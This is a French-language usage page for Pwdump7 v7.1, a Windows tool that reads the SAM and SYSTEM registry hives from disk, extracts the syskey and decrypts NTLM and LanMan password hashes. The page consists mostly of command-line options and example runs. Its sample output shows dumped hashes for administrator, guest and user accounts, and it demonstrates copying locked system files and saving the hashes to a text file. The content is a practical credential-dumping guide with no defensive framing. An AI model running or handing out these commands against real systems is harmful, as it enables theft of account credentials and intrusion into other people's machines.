Pwdump7 v7.1
Description
Pwdump7 fonctionne avec son propre pilote de système de fichier (à partir de la technologie rkdetector.com) afin que les utilisateurs avec les privilèges d'administrateur soient en mesure de récupérer à partir du disque les ruches du registre SYSTEM et SAM de Windows XP/Vista/2000/2003.
Une fois récupérée, la clé syskey sera extrait de la ruche SYSTEM et ensuite utilisée pour décrypter les deux hash NTLM et LanMan dans le format pwdump.
Utilisation de Pwdump7
|
(Affiche le hash des mots de passe de la base SAM) |
|
(Affiche le hash des mots de passe d'un fichier SAM) |
- Pwdump7.exe -d [destionation]
|
(Copie le fichier du Système Windows vers la destination) |
|
(Afficher l'aide) |
- Pwdump7.exe > password.txt
|
(Copie le hash des mots de passe vers le fichier password.txt) |
Exemples :
Afficher le hash des mots de passe :
Pwdump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::
guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::
atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::
Copie des fichiers Système verrouillés par Windows :
Pwdump7.exe -d c:\pagefile.sys pagefile.dmp
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
saving c:\pagefile.sys as pagefile.dmp
Afficher le hash des mots de passe depuis une autre source :
Pwdump7.exe -s c:\sam.dmp c:\system.dmp
Copie le hash des mots de passe dans le fichier password.txt :
Pwdump7.exe > password.txt
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
Type password.txt
administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::
guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::
atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::